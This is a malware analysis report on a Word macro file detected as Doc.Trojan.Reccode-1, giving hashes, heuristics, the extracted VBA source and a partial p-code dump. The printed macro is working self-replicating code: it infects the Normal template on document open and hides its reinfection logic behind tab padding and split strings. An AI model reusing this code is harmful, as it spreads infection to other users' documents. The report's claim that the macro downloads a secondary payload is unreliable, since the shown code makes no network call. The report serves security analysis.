Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 92d744151b322c53…

MALICIOUS

Office (OLE)

35.0 KB Created: 1999-04-05 10:02:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 97eb3d0b894e81de54b71e396812ff17 SHA-1: 047db5b3219058d9bc610d56dc7e32123bca2d7f SHA-256: 92d744151b322c53e90d9834240ae583d5a251f21817aab15c49ca305ac3252a
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The macro attempts to deobfuscate and execute code, likely to download and run a secondary payload. The ClamAV detection of 'Doc.Trojan.Reccode-1' further supports its malicious nature.

Heuristics 3

  • ClamAV: Doc.Trojan.Reccode-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Reccode-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4660 bytes
SHA-256: 9fba49eff5978058ae28a2024e0673f7e76afaf3e062962bb0fd4c7a6d9b44c3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim NTmp As Object
Set NTmp = Normal.ThisDocument
Dim Adc As Object
Set Adc = Project.ThisDocument
Dim TDc As Object
Set TDc = ThisDocument
Set AC = Adc.VBProject.VBComponents(1).CodeModule
Set NC = NTmp.VBProject.VBComponents(1).CodeModule
Set TD = TDc.VBProject.VBComponents(1).CodeModule
NTmp.Variables("RecCode").Value = TD.Lines(1, TD.CountOfLines)
Adc.Variables("RecCode").Value = TD.Lines(1, TD.CountOfLines)
UnstealthA = "With ThisDo" & "cument.VBPr" & "oject." & "VBCompo" & "nents(1" & ").CodeModule: "
UnstealthB = ".DeleteL" & "ines 1" & ", .CountO" & "fLines: "
UnStealthC = ".InsertLin" & "es 1, T" & "hisDo" & "cument.Variab" & "les(1)" & ".Value: "
UnStealthD = "End With"
UnStealth = String(175, Chr(9)) & "If ShowVisualBasicEditor = True Then Exit Sub: " & UnstealthA & UnstealthB & UnStealthC & UnStealthD
NC.DeleteLines 1, NC.CountOfLines: NC.InsertLines 1, "Private Sub Document_Close" & Chr(13) & UnStealth & Chr(13) & "End Sub"
AC.DeleteLines 1, AC.CountOfLines: AC.InsertLines 1, "Private Sub Document_Close" & Chr(13) & UnStealth & Chr(13) & "End Sub"
End Sub

' Processing file: /opt/analyzer/scan_staging/b2095bf0965b4098a9de21d300997fea.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5879 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	Dim 
' 	VarDefn NTmp (As Object)
' Line #2:
' 	SetStmt 
' 	Ld Normal 
' 	MemLd ThisDocument 
' 	Set NTmp 
' Line #3:
' 	Dim 
' 	VarDefn Adc (As Object)
' Line #4:
' 	SetStmt 
' 	Ld Project 
' 	MemLd ThisDocument 
' 	Set Adc 
' Line #5:
' 	Dim 
' 	VarDefn TDc (As Object)
' Line #6:
' 	SetStmt 
' 	Ld ThisDocument 
' 	Set TDc 
' Line #7:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld Adc 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set AC 
' Line #8:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NTmp 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set NC 
' Line #9:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld TDc 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set TD 
' Line #10:
' 	LitDI2 0x0001 
' 	Ld TD 
' 	MemLd CountOfLines 
' 	Ld TD 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0007 "RecCode"
' 	Ld NTmp 
' 	ArgsMemLd Variables 0x0001 
' 	MemSt Value 
' Line #11:
' 	LitDI2 0x0001 
' 	Ld TD 
' 	MemLd CountOfLines 
' 	Ld TD 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0007 "RecCode"
' 	Ld Adc 
' 	ArgsMemLd Variables 0x0001 
' 	MemSt Value 
' Line #12:
' 	LitStr 0x000B "With ThisDo"
' 	LitStr 0x000B "cument.VBPr"
' 	Concat 
' 	LitStr 0x0006 "oject."
' 	Concat 
' 	LitStr 0x0007 "VBCompo"
' 	Concat 
' 	LitStr 0x0007 "nents(1"
' 	Concat 
' 	LitStr 0x000E ").CodeModule: "
' 	Concat 
' 	St UnstealthA 
' Line #13:
' 	LitStr 0x0008 ".DeleteL"
' 	LitStr 0x0006 "ines 1"
' 	Concat 
' 	LitStr 0x0009 ", .CountO"
' 	Concat 
' 	LitStr 0x0008 "fLines: "
' 	Concat 
' 	St UnstealthB 
' Line #14:
' 	LitStr 0x000A ".InsertLin"
' 	LitStr 0x0007 "es 1, T"
' 	Concat 
' 	LitStr 0x0005 "hisDo"
' 	Concat 
' 	LitStr 0x000D "cument.Variab"
' 	Concat 
' 	LitStr 0x0006 "les(1)"
' 	Concat 
' 	LitStr 0x0008 ".Value: "
' 	Concat 
' 	St UnStealthC 
' Line #15:
' 	LitStr 0x0008 "End With"
' 	St UnStealthD 
' Line #16:
' 	LitDI2 0x00AF 
' 	LitDI2 0x0009 
' 	ArgsLd Chr 0x0001 
' 	ArgsLd String$ 0x0002 
' 	LitStr 0x002F "If ShowVisualBasicEditor = True Then Exit Sub: "
' 	Concat 
' 	Ld UnstealthA 
' 	Concat 
' 	Ld UnstealthB 
' 	Concat 
' 	Ld UnStealthC 
' 	Concat 
' 	Ld UnStealthD 
' 	Concat 
' 	St UnStealth 
' Line #17:
' 	LitDI2 0x0001 
' 	Ld NC 
' 	MemLd CountOfLines 
' 	Ld NC 
' 	ArgsMemCall DeleteLines 0x0002 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	LitStr 0x001A "Private Sub Document_Close"
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	Ld UnStealth 
' 	Co
... (truncated)